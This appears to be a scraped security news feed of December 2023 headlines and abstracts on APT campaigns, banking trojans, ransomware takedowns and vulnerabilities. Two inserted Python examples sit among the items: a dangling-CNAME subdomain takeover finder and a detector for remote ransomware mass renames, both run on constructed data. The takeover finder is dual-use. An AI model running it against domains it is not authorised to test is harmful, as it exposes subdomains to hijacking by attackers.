Abstract Organizations in the Defense Industrial Base (DIB) sector are in the crosshairs of an Iranian threat actor as part of a campaign designed to deliver a never-before-seen backdoor called FalseFont. The findings come from Microsoft, which is tracking the activity under its weather-themed moniker  Peach Sandstorm  (formerly Holmium), which is also known as APT33, Elfin, and Refined Kitten. "FalseFont is a custom backdoor with a wide range of functionalities that allow operators to remotely access an infected system, launch additional files, and send information to its [command-and-control] servers," the Microsoft Threat Intelligence team  said  on X (previously Twitter). The first recorded use of the implant was in early November 2023. The tech giant further said that the latest development aligns with previous activity from Peach Sandstorm and demonstrates a continued evolution of the threat actor's tradecraft. In a report published in September 2023, Microsoft  linke

The Hacker News

December 22, 2023

Android Banking Trojan Chameleon can Now Bypass Any Biometric Authentication Full Text

Abstract The Chameleon banking trojan has evolved with new advanced features, including the ability to bypass biometric prompts and display HTML pages for enabling Accessibility Services on Android 13, making it a potent threat to mobile banking security.

Cyware

December 21, 2023 – Vulnerabilities

Google Addressed a New Actively Exploited Chrome Zero-Day Full Text

Abstract Google has released emergency updates to fix a zero-day vulnerability in the Chrome browser. The vulnerability, known as CVE-2023-7024, is a heap buffer overflow issue in WebRTC.

Cyware

December 21, 2023 – Privacy

Experts Detail Multi-Million Dollar Licensing Model of Predator Spyware Full Text

Abstract A new analysis of the sophisticated commercial spyware called Predator has revealed that its ability to persist between reboots is offered as an "add-on feature" and that it depends on the licensing options opted by a customer. "In 2021, Predator spyware couldn't survive a reboot on the infected Android system (it had it on iOS)," Cisco Talos researchers Mike Gentile, Asheer Malhotra, and Vitor Ventura  said  in a report shared with The Hacker News. "However, by April 2022, that capability was being offered to their customers." Predator is the product of a consortium called the Intellexa Alliance, which includes Cytrox (subsequently acquired by WiSpear), Nexa Technologies, and Senpai Technologies. Both Cytrox and Intellexa were  added  to the Entity List by the U.S. in July 2023 for "trafficking in cyber exploits used to gain access to information systems." The latest findings come more than six months after the cybersecurity vendor detai

The Hacker News

December 21, 2023 – Policy and Law

Cyber Risk Strategies in Hot Seat as SEC Rules Go Live Full Text

Abstract Companies are reassessing their incident response plans and determining the materiality of cyber incidents. The SEC aims to improve companies' preparedness to mitigate breaches and attacks.

Cyware

December 21, 2023 – Malware

Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication Full Text

Abstract Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy. "Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region," Dutch mobile security firm ThreatFabric  said  in a report shared with The Hacker News. Chameleon was  previously documented  by Cyble in April 2023, noting that it had been used to single out users in Australia and Poland since at least January. Like other banking malware, it's known to abuse its permissions to Android's accessibility service to harvest sensitive data and conduct overlay attacks. The rogue apps containing the earlier version were hosted on phishing pages and found to impersonate genuine institutions in the countries, such as the Australian Taxation Offic

The Hacker News

December 21, 2023 – Attack

Indian Tech Giant HCL Investigating Ransomware Attack Full Text

Abstract HCL Technologies has reported a ransomware attack on one of its projects in an isolated cloud environment. The company stated that the incident has had no impact on its overall network and that cybersecurity and data protection are top priorities.

Cyware

December 21, 2023 – Malware

New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide Full Text

Abstract A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world. The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan. IBM Security Trusteer said it detected the campaign in March 2023. "Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus  said . Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack[.]com"), specifically targeting a page structure that's common to several banks. It's susp

The Hacker News

December 21, 2023 – Attack

Russian Water Utility Rosvodokanal Hit by Disruptive Cyberattack From Blackjack Group Full Text

Abstract This attack was seen as retaliation for an earlier cyberattack on Kyivstar, a phone company in Ukraine, which was attributed to Russian hackers. There are suspicions that the Security Service of Ukraine (SBU) may have played a role in the attack.

Cyware

December 21, 2023 – General

Cost of a Data Breach Report 2023: Insights, Mitigators and Best Practices Full Text

Abstract John Hanley of IBM Security shares 4 key findings from the highly acclaimed annual Cost of a Data Breach Report 2023 What is the IBM Cost of a Data Breach Report? The IBM Cost of a Data Breach Report is an annual report that provides organizations with quantifiable information about the financial impacts of breaches. With this data, they can make data driven decisions about how they implement security in their organization. The report is conducted by the Ponemon Institute and sponsored, analyzed, and published by IBM Security. In 2023, the 18th year the report was published, the report analyzed 553 breaches across 16 countries and 17 industries. According to Etay Maor, Senior Director of Security Strategy at  Cato Networks , "We tend to talk a lot about security issues and solutions. This report puts a number behind threats and solutions and provides a lot of information to support claims of how a threat actor, a solution or a process impacts you financially." Key Finding #1: The

The Hacker News

December 21, 2023 – Solution

Subdominator: Open-Source Tool for Detecting Subdomain Takeovers Full Text

Abstract Subdominator is a highly accurate and fast open-source tool for identifying subdomain takeovers, offering significant improvements over existing tools in terms of fingerprint accuracy and count, nested DNS support, and alternate DNS record matching.

Cyware
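The abstract mentions nested DNS support and fingerprint matching, which are the two parts of a takeover check worth seeing side by side. The Python below is an added example, not Subdominator's code: it follows CNAME chains through a constructed resolver table, stops on loops, and reports a subdomain only when the chain ends at a name that is both NXDOMAIN and under a third-party suffix where anyone could register it. The provider suffixes and DNS records are hypothetical; a real fingerprint set pairs each suffix with the provider's specific error response.

```python
"""Dangling-CNAME subdomain takeover check over a constructed DNS table.

Added example, not Subdominator's code. FINGERPRINTS and DNS are assumptions
built for the demonstration; nothing here performs network lookups.
"""

# Assumed fingerprints: CNAME target suffixes belonging to third-party hosts
# where an unclaimed name can be registered by anyone.
FINGERPRINTS = {
    "pages.hosting.test": "Hypothetical static-site host",
    "cdn.storage.test": "Hypothetical object storage",
}

# Constructed resolver data: name -> records. A name absent from the table is NXDOMAIN.
DNS = {
    "www.example.com": {"CNAME": "edge.example.com"},
    "edge.example.com": {"A": "203.0.113.10"},
    "blog.example.com": {"CNAME": "blog-alias.example.com"},
    "blog-alias.example.com": {"CNAME": "old-blog.pages.hosting.test"},  # nested, dangling
    "docs.example.com": {"CNAME": "docs-live.pages.hosting.test"},
    "docs-live.pages.hosting.test": {"A": "198.51.100.7"},  # still claimed, not vulnerable
    "loop.example.com": {"CNAME": "loop2.example.com"},
    "loop2.example.com": {"CNAME": "loop.example.com"},
    "assets.example.com": {"CNAME": "bucket-123.cdn.storage.test"},  # dangling
}


def resolve_chain(name, dns=DNS, max_depth=8):
    """Follow CNAMEs from name.

    Returns (terminal_name, chain, status) with status one of
    'resolves', 'nxdomain', 'loop' or 'too_deep'.
    """
    chain = [name]
    seen = {name}
    current = name
    for _ in range(max_depth):
        records = dns.get(current)
        if records is None:
            return current, chain, "nxdomain"
        target = records.get("CNAME")
        if target is None:
            return current, chain, "resolves"
        if target in seen:
            return target, chain + [target], "loop"
        seen.add(target)
        chain.append(target)
        current = target
    return current, chain, "too_deep"


def match_fingerprint(target):
    """Provider label if target sits under a fingerprinted suffix, else None."""
    for suffix, provider in FINGERPRINTS.items():
        if target == suffix or target.endswith("." + suffix):
            return provider
    return None


def find_takeover_candidates(names, dns=DNS):
    """Subdomains whose CNAME chain ends NXDOMAIN at a fingerprinted provider."""
    candidates = []
    for name in names:
        terminal, chain, status = resolve_chain(name, dns)
        provider = match_fingerprint(terminal)
        if status == "nxdomain" and provider:
            candidates.append({"subdomain": name, "chain": chain, "provider": provider})
    return candidates


if __name__ == "__main__":
    for c in find_takeover_candidates(list(DNS)):
        print(c["subdomain"], "->", " -> ".join(c["chain"][1:]), f"({c['provider']})")
```

A chain that ends NXDOMAIN outside any fingerprinted suffix is still a dangling record worth cleaning up, but it is not a takeover candidate, which is why the two conditions are checked together.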

December 21, 2023 – Criminals

German Authorities Dismantle Dark Web Hub ‘Kingdom Market’ in Global Operation Full Text

Abstract German law enforcement has announced the disruption of a dark web platform called  Kingdom Market  that specialized in the sales of narcotics and malware to "tens of thousands of users." The  exercise , which involved collaboration with authorities from the U.S., Switzerland, Moldova, and Ukraine, began on December 16, 2023, the Federal Criminal Police Office (BKA) said. Kingdom Market is said to have been accessible over the TOR and Invisible Internet Project (I2P) anonymization networks since at least March 2021, trafficking in illegal narcotics as well as advertising malware, criminal services, and forged documents. As many as 42,000 products have been sold via several hundred seller accounts on the English language platform prior to its takedown, with 3,600 of them originating from Germany.  Transactions on the Kingdom Market were facilitated through cryptocurrency payments in the form of Bitcoin, Litecoin, Monero, and Zcash, with the website operators receiving a 3

The Hacker News

December 21, 2023 – General

AI’s Efficacy is Constrained in Cybersecurity, but Limitless in Cybercrime Full Text

Abstract The use of AI in cybersecurity has created a cycle where both cyber professionals and cybercriminals employ AI to enhance their tools and techniques. However, there are limitations and trust issues with AI security solutions.

Cyware

December 21, 2023 – Phishing

Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware Full Text

Abstract Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called  Agent Tesla . The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office's Equation Editor that could result in code execution with the privileges of the user. The findings, which come from Zscaler ThreatLabz, build on prior reports from Fortinet FortiGuard Labs, which detailed a  similar phishing campaign  that exploited the security flaw to deliver the malware. "Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction," security researcher Kaiva

The Hacker News

December 21, 2023 – Phishing

Fake F5 Vulnerability ‘Update’ Delivers Data Wiper to Israeli Victims Full Text

Abstract The attacker takes advantage of a vulnerability in F5's BIG-IP and tricks recipients into downloading a file that is supposed to be an update for the vulnerability. However, the file actually contains a wiper that deletes F5 servers.

Cyware

December 20, 2023 – General

Malware Leveraging Public Infrastructure Like GitHub on the Rise Full Text

Abstract Public services like GitHub provide a convenient and less suspicious platform for malware authors to operate their C2 infrastructure, eliminating the need for maintaining their own servers.

Cyware

December 20, 2023 – Ransomware

Remote Encryption Attacks Surge: How One Vulnerable Device Can Spell Disaster Full Text

Abstract Ransomware groups are increasingly switching to remote encryption in their attacks, marking a new escalation in tactics adopted by financially motivated actors to ensure the success of their campaigns. "Companies can have thousands of computers connected to their network, and with remote ransomware, all it takes is one underprotected device to compromise the entire network," Mark Loman, vice president of threat research at Sophos,  said .  "Attackers know this, so they hunt for that one 'weak spot' — and most companies have at least one. Remote encryption is going to stay a perennial problem for defenders." Remote encryption  (aka remote ransomware), as the name implies, occurs when a compromised endpoint is used to encrypt data on other devices on the same network. In October 2023, Microsoft  revealed  that around 60% of ransomware attacks now involve malicious remote encryption in an effort to minimize their footprint, with more than 80% of all compr

The Hacker News
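Remote encryption leaves no ransomware binary on the file server, so the signal has to come from the server's own view of who is touching its files. The Python below is an added example, not Sophos or Microsoft tooling: it replays constructed file-share audit lines and raises an alert for any client that, within a sliding window, renames many files across several directories while appending the same new suffix each time. The log format, thresholds, hosts and paths are assumptions; map them onto whatever your file server or SMB audit pipeline actually emits.

```python
"""Detect remote mass-rename activity from a file-server audit log.

Added example, not Sophos or Microsoft tooling. The log format, thresholds and
events are constructed assumptions: one line per file operation, with a
'->' target for renames.
"""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<user>\S+) (?P<op>[A-Z]+) (?P<path>\S+)(?: -> (?P<new>\S+))?$"
)


def parse(line):
    """Parse one constructed audit line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def parent_dir(path):
    return path.rsplit("\\", 1)[0]


def new_suffix(old, new):
    """Suffix gained by a rename ('Q3.xlsx' -> 'Q3.xlsx.locked' gives '.locked').

    Falls back to the new file's extension when the whole name changed.
    """
    if new.startswith(old):
        return new[len(old):]
    tail = new.rsplit("\\", 1)[-1]
    return "." + tail.rsplit(".", 1)[-1] if "." in tail else None


def detect_remote_encryption(lines, window=timedelta(seconds=60),
                             min_renames=20, min_dirs=3, min_share=0.8):
    """Alert per client that renamed >= min_renames files across >= min_dirs
    directories inside `window`, with one suffix accounting for >= min_share of them."""
    recent = defaultdict(deque)  # client -> deque of (ts, dir, suffix)
    alerts = {}
    for ev in filter(None, map(parse, lines)):
        if ev["op"] != "RENAME" or ev["new"] is None:
            continue
        q = recent[ev["client"]]
        q.append((ev["ts"], parent_dir(ev["path"]), new_suffix(ev["path"], ev["new"])))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        if len(q) < min_renames:
            continue
        dirs = {d for _, d, _ in q}
        common = Counter(s for _, _, s in q if s).most_common(1)
        if not common:
            continue
        suffix, count = common[0]
        if len(dirs) >= min_dirs and count / len(q) >= min_share:
            a = alerts.setdefault(ev["client"], {
                "user": ev["user"], "first_seen": q[0][0],
                "suffix": suffix, "renames": 0, "dirs": set(),
            })
            a["renames"] = max(a["renames"], len(q))
            a["dirs"] |= dirs
            a["last_seen"] = ev["ts"]
    return alerts


def constructed_log():
    """Constructed audit lines: one ordinary workstation and one laptop
    encrypting four shared folders over SMB (24 renames in about 36 seconds)."""
    base = datetime(2023, 12, 19, 9, 1, 0)

    def stamp(sec):
        return (base + timedelta(seconds=sec)).strftime("%Y-%m-%dT%H:%M:%SZ")

    lines = [
        stamp(0) + r" 10.0.4.50 asmith READ \\fs01\hr\handbook.pdf",
        stamp(5) + r" 10.0.4.50 asmith RENAME \\fs01\hr\draft.docx -> \\fs01\hr\policy-v2.docx",
        stamp(9) + r" 10.0.4.50 asmith WRITE \\fs01\hr\policy-v2.docx",
    ]
    dirs = [r"\\fs01\finance", r"\\fs01\legal", r"\\fs01\hr", r"\\fs01\eng"]
    for i in range(24):
        f = dirs[i % 4] + "\\" + f"file{i:02d}.xlsx"
        lines.append(f"{stamp(10 + i * 1.5)} 10.0.4.23 jdoe RENAME {f} -> {f}.locked")
    return lines


if __name__ == "__main__":
    for client, a in detect_remote_encryption(constructed_log()).items():
        print(client, a["user"], a["suffix"], a["renames"], sorted(a["dirs"]))
```

The alert names the client, not the server, which is the point: the response is to isolate the one under-protected endpoint doing the renaming, while the file server itself never ran any malware.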

December 20, 2023 – Attack

Decrypting the Sidewinder Cyber Intrusion Tactics Full Text

Abstract The Sidewinder group, a sophisticated APT group originating from South Asia, is behind a highly targeted cyber threat campaign involving a malicious Word document with an embedded macro, potentially targeting Nepalese government officials.

Cyware

December 20, 2023 – Solution

Product Explained: Memcyco’s Real-Time Defense Against Website Spoofing Full Text

Abstract Hands-On Review: Memcyco's Threat Intelligence Solution Website impersonation, also known as brandjacking or website spoofing, has emerged as a significant threat to online businesses. Malicious actors clone legitimate websites to trick customers, leading to financial scams and data theft causing reputation damage and financial losses for both organizations and customers. The Growing Threat of Website Impersonation and Brandjacking Research shows a new phishing site is created every 11 seconds in 2023. Typically, even though the company is a victim of spoofing, the customer holds them responsible for the data breach.  Current market solutions rely on threat intelligence tools that search for fake sites and attempt takedowns. However, takedown processes can be time-consuming, leaving fake sites active and the scope of attacks remains unknown during the critical window of exposure, the time between when the fake site is up and until it is down. Bad actor researches a business to t

The Hacker News

December 20, 2023 – Breach

Update: Israel Blames Iran for Hospital Data Breach Full Text

Abstract Israel has identified Iran and Hezbollah as the perpetrators of a cyberattack on the Ziv Medical Center. The attack, which occurred last month, resulted in the theft of 500GB of medical data.

Cyware

December 20, 2023 – Phishing

Alert: Chinese-Speaking Hackers Pose as UAE Authority in Latest Smishing Wave Full Text

Abstract The Chinese-speaking threat actors behind  Smishing Triad  have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country. "These criminals send malicious links to their victims' mobile devices through SMS or iMessage and use URL-shortening services like Bit.ly to randomize the links they send," Resecurity  said  in a report published this week. "This helps them protect the fake website's domain and hosting location." Smishing Triad was  first documented  by the cybersecurity company in September 2023, highlighting the group's use of compromised Apple iCloud accounts to send smishing messages for carrying out identity theft and financial fraud.  The threat actor is also known to offer ready-to-use smishing kits for sale to other cybercriminals for $200 a month, alongside eng

The Hacker News

December 20, 2023 – Criminals

Global Law Enforcement Seizes $300 Million, Arrests 3,500 Involved in Transnational Cybercrime Operation Full Text

Abstract The operation targeted various online scams, including voice phishing, romance scams, investment fraud, and e-commerce fraud, highlighting the significant financial incentives driving the growth of organized cybercrime.

Cyware

December 20, 2023 – Criminals

3,500 Arrested in Global Operation HAECHI-IV Targeting Financial Criminals Full Text

Abstract A six-month-long international police operation codenamed  HAECHI-IV  has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries. The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud. In addition, authorities froze associated bank and virtual asset service provider (VASP) accounts in an effort to shut off access to criminal proceeds. In total, authorities blocked 82,112 suspicious bank accounts, confiscating $199 million in hard currency and $101 million in virtual assets. "Cooperation between Filipino and Korean authorities led to the arrest in Manila of a high-profile online gambling criminal after a two-year manhunt by Korea's National Police Agency," Interpol, an internationa

The Hacker News

December 20, 2023 – Phishing

Global Malspam Targets Hotels, Spreading Redline and Vidar Stealers Full Text

Abstract The hospitality industry is being targeted by a sophisticated malspam campaign that uses social engineering tactics to trick hotel representatives into opening password-protected archives containing malware.

Cyware

December 20, 2023 – Malware

New Go-Based JaskaGO Malware Targeting Windows and macOS Systems Full Text

Abstract A new Go-based information stealer malware called  JaskaGO  has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems. AT&T Alien Labs, which made the discovery,  said  the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server." Artifacts designed for macOS were first observed in July 2023, impersonating installers for legitimate software such as CapCut. Other variants of the malware have masqueraded as AnyConnect and security tools.  Upon installation, JaskaGO runs checks to determine if it is executing within a virtual machine (VM) environment, and if so, executes a harmless task like pinging Google or printing a random number in a likely effort to fly under the radar. In other scenarios, JaskaGO proceeds to harvest information from the victim system and establishes a connection to its C&C for receiving further instructions, including executing shell commands, enumerating

The Hacker News

December 20, 2023 – APT

Iranian APT Group Targets Telecom Organizations in North and East Africa Full Text

Abstract Seedworm (aka Muddywater) continues to use a combination of living-off-the-land and publicly available tools, but has also developed its own custom tools, such as a custom build of Venom Proxy and a custom keylogger.

Cyware

December 20, 2023 – Government

‘No Evidence’ of Foreign Election Interference in 2022 US Midterms, Spy Agencies Say Full Text

Abstract The U.S. intelligence community has stated that Russia and China attempted to influence the 2022 U.S. midterms, but were unsuccessful in hacking the election infrastructure or disrupting voting.

Cyware

December 20, 2023 – Criminals

Authorities Claim Seizure of Notorious ALPHV Ransomware Gang’s Dark Web Leak Site Full Text

Abstract The FBI has released a decryption tool that has helped over 500 ALPHV ransomware victims restore their systems, saving them from paying approximately $68 million in ransom demands.

Cyware

December 19, 2023 – Phishing

New Scam Involving Remote Jobs on Social Media Platforms Full Text

Abstract Researchers at Bitdefender Labs have uncovered a new scam involving remote jobs on social media platforms. Scammers are promising payment for simply liking YouTube videos.

Cyware

December 19, 2023 – Criminals

FBI Takes Down BlackCat Ransomware, Releases Free Decryption Tool Full Text

Abstract The U.S. Justice Department (DoJ) has officially  announced  the disruption of the BlackCat ransomware operation and released a decryption tool that victims can use to regain access to files locked by the malware. Court documents show that the U.S. Federal Bureau of Investigation (FBI) enlisted the help of a confidential human source (CHS) to act as an affiliate for the BlackCat and gain access to a web panel used for managing the gang's victims, in what's a case of hacking the hackers. BlackCat , also called ALPHV and Noberus,  first emerged  in December 2021 and has since gone on to be the second most prolific ransomware-as-a-service variant in the world after LockBit. It's also the first Rust-language-based ransomware strain spotted in the wild. The development  puts an end to speculations  of a rumored law enforcement action after its dark web leak portal went offline on December 7, only to resurface five days later with just a single victim. The FBI said it worke

The Hacker News

December 19, 2023 – Government

FBI, CISA, and ACSC Release Joint Advisory on Play Ransomware Full Text

Abstract The Play ransomware group has been targeting businesses and critical infrastructure in North America, South America, and Europe since June 2022. They use a double-extortion model, encrypting systems after exfiltrating data.

Cyware

December 19, 2023 – Criminals

Behind the Scenes of Matveev’s Ransomware Empire: Tactics and Team Full Text

Abstract Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world. Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, Orange, and waza, is alleged to have played a crucial part in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020. "Wazawaka and his team members prominently exhibit an insatiable greed for ransom payments, demonstrating a significant disregard for ethical values in their cyber operations," Swiss cybersecurity firm PRODAFT said in a comprehensive analysis shared with The Hacker News. "Employing tactics that involve intimidation through threats to leak sensitive files, engaging in dishonest practices, and persisting in retaining fil

The Hacker News

December 19, 2023 – Attack

Ransomware Attack on Westpole Disrupted Digital Services for Italian Public Administration Full Text

Abstract One of Westpole's customers, PA Digitale, which serves 1300 public administrations including 540 municipalities, was targeted. The incident has led to manual operations for some services and may affect salary payments.

Cyware

December 19, 2023 – Hacker

Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts Full Text

Abstract Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages. "Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware." Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address. While using public sources for C2 does not make them immune to takedowns, they do offer the benefit of allowing threat actors to easily create attack infrastructure that's both inexpensive and reliable. This technique is sneaky

The Hacker News

December 19, 2023 – Phishing

Novel SMTP Smuggling Technique Slips Past DMARC, Email Protections Full Text

Abstract Attackers can exploit SMTP smuggling to send spoofed emails with fake sender addresses, bypassing email security checks and putting organizations and individuals at risk for targeted phishing attacks.

Cyware

December 19, 2023 – General

Are We Ready to Give Up on Security Awareness Training? Full Text

Abstract Some of you have already started budgeting for 2024 and allocating funds to security areas within your organization. It is safe to say that employee security awareness training is one of the expenditure items, too. However, its effectiveness is an open question with people still engaging in insecure behaviors at the workplace. Besides, social engineering remains one of the most prevalent attacks, followed by a successful data breach. Microsoft found that a popular form of video-based training reduces phish-clicking behavior by about 3%, at best. This number has been stable over the years, says Microsoft, while phishing attacks are increasing yearly. Regardless, organizations have faith in training and tend to increase their security investments in employee training after attacks. It comes second in the priority list for 51% of organizations, right after incident response planning and testing, according to the IBM Security "Cost of the Data Breach Report 2023". So, wh

The Hacker News

December 19, 2023 – Government

US Agencies Release Security Guidance on Managing SBOMs and Open Source Software Full Text

Abstract The report provides guidance on open source software adoption, including criteria for selection, risk assessment, licensing, export control, maintenance, vulnerability response, and secure software delivery.

Cyware

December 19, 2023 – Attack

Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa Full Text

Abstract The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix. Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East. The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020. While the full extent of MuddyC2Go'

The Hacker News

December 19, 2023 – Attack

Iran Hit by Major Cyberattack Targeting Nation’s Fuel Supply Full Text

Abstract Gas stations in Iran experienced widespread disruptions due to a cyberattack claimed by the group Predatory Sparrow, which has previously targeted Iranian critical infrastructure.

Cyware

December 19, 2023 – Phishing

New Malvertising Campaign Distributing PikaBot Disguised as Popular Software Full Text

Abstract The malware loader known as PikaBot is being distributed as part of a malvertising campaign targeting users searching for legitimate software like AnyDesk. "PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577," Malwarebytes' Jérôme Segura said. The malware family, which first appeared in early 2023, consists of a loader and a core module that allows it to operate as a backdoor as well as a distributor for other payloads. This enables the threat actors to gain unauthorized remote access to compromised systems and transmit commands from a command-and-control (C2) server, ranging from arbitrary shellcode, DLLs, or executable files, to other malicious tools such as Cobalt Strike. One of the threat actors leveraging PikaBot in its attacks is TA577, a prolific cybercrime threat actor that has, in the past, delivered QakBot, IcedID, SystemBC, SmokeLoad

The Hacker News

December 19, 2023 – Attack

Apparel Giant VF Corporation Reports Cyberattack on First Day of SEC Disclosure Rule Full Text

Abstract VF Corporation, one of the largest apparel companies in the world, reported a cyberattack to the U.S. Securities and Exchange Commission (SEC) on the first day of a new cyber incident reporting rule.

Cyware

December 18, 2023 – General

Pro-China Influence Operation Gained YouTube Following, Researchers Find Full Text

Abstract The campaign utilizes a network of at least 30 YouTube channels and employs tactics associated with both Russian and Chinese influence operations, including the use of artificially generated voices in videos.

Cyware

December 18, 2023 – Vulnerabilities

Beware: Experts Reveal New Details on Zero-Click Outlook RCE Exploits Full Text

Abstract Technical details have emerged about two now-patched security flaws in Microsoft Windows that could be chained by threat actors to achieve remote code execution on the Outlook email service sans any user interaction. "An attacker on the internet can chain the vulnerabilities together to create a full, zero-click remote code execution (RCE) exploit against Outlook clients," Akamai security researcher Ben Barnea, who discovered the vulnerabilities, said in a two-part report shared with The Hacker News. The security issues, which were addressed by Microsoft in August and October 2023, respectively, are listed below - CVE-2023-35384 (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability; CVE-2023-36710 (CVSS score: 7.8) - Windows Media Foundation Core Remote Code Execution Vulnerability. CVE-2023-35384 has been described by Akamai as a bypass for a critical security flaw that Microsoft patched in March 2023. Tracked as CVE-2023-23397 (C

The Hacker News

December 18, 2023 – Government

UK National Grid Pulls Chinese Equipment Over Cybersecurity Concerns Full Text

Abstract The contract with NR Electric UK, a subsidiary of China's Nari Technology, was terminated without reason given in April, highlighting growing concerns over Chinese involvement in critical infrastructure.

Cyware

December 18, 2023 – General

Top 7 Trends Shaping SaaS Security in 2024 Full Text

Abstract Over the past few years, SaaS has developed into the backbone of corporate IT. Service businesses, such as medical practices, law firms, and financial services firms, are almost entirely SaaS based. Non-service businesses, including manufacturers and retailers, have about 70% of their software in the cloud. These applications contain a wealth of data, from minimally sensitive general corporate information to highly sensitive intellectual property, customer records, and employee data. Threat actors have noted this shift, and are actively working to breach apps to access the data. Here are the top trends influencing the state of SaaS Security for 2024 — and what you can do about it. Democratization of SaaS: SaaS apps have transformed the way organizations purchase and use software. Business units purchase and onboard the SaaS tools that best fit their needs. While this is empowering for business units that have long been frustrated by delays in procuring and onboarding software, i

The Hacker News

December 18, 2023 – Insider Threat

Ubiquiti Fixes Glitch That Exposed Private Video Streams to Other Customers Full Text

Abstract The bug was caused by a misconfiguration during an upgrade to Ubiquiti's cloud infrastructure, resulting in 1,216 accounts being improperly associated with another group of 1,177 accounts.

Cyware

December 18, 2023 – Malware

Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges Full Text

Abstract The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable. This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said in a technical deep dive published last week. Rhadamanthys, first documented by ThreatMon in October 2022, has been sold under the malware-as-a-service (MaaS) model as early as September 2022 by an actor under the alias "kingcrete2022." Typically distributed through malicious websites mirroring those of genuine software that are advertised through Google ads, the malware is capable of harvesting a wide range of sensitive information from compromised hosts, including from web browsers, crypto wallets, email clients, VPN, and instant messaging apps. "Rhadamanthys represents a s

The Hacker News

December 18, 2023 – Botnet

InfectedSlurs Botnet Targets QNAP VioStor NVR Vulnerability Full Text

Abstract Default admin credentials and outdated, unsupported networked systems are being exploited as routes for botnet infections, highlighting the importance of updating and securing legacy systems.

Cyware

December 18, 2023 – Policy and Law

Four U.S. Nationals Charged in $80 Million Pig Butchering Crypto Scam Full Text

Abstract Four U.S. nationals have been charged for participating in an illicit scheme that earned them more than $80 million via cryptocurrency investment scams. The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, Rosemead, California; and Hailong Zhu, 40, Naperville, Illinois – have been charged with conspiracy to commit money laundering, concealment money laundering, and international money laundering. The U.S. Department of Justice (DoJ), which announced the arrests of both Zhang and Walker in connection with the fraudulent operation, said the quartet opened shell companies and bank accounts to carry out pig butchering scams, transferring the ill-gotten funds to domestic and international financial entities. If convicted, Zhang and Walker face a maximum penalty of 20 years in prison. Their alleged co-conspirators remain at large. "The overall fraud scheme in the related pig-butchering syndicate involved at least 284

The Hacker News

December 18, 2023 – Policy and Law

NY Engineer Pleads Guilty to Stealing Millions From Two Crypto Exchanges Full Text

Abstract A former security engineer has pleaded guilty to hacking two decentralized cryptocurrency exchanges, resulting in the theft of over $12 million. The hacker exploited vulnerabilities in the smart contracts of the exchanges.

Cyware

December 18, 2023 – General

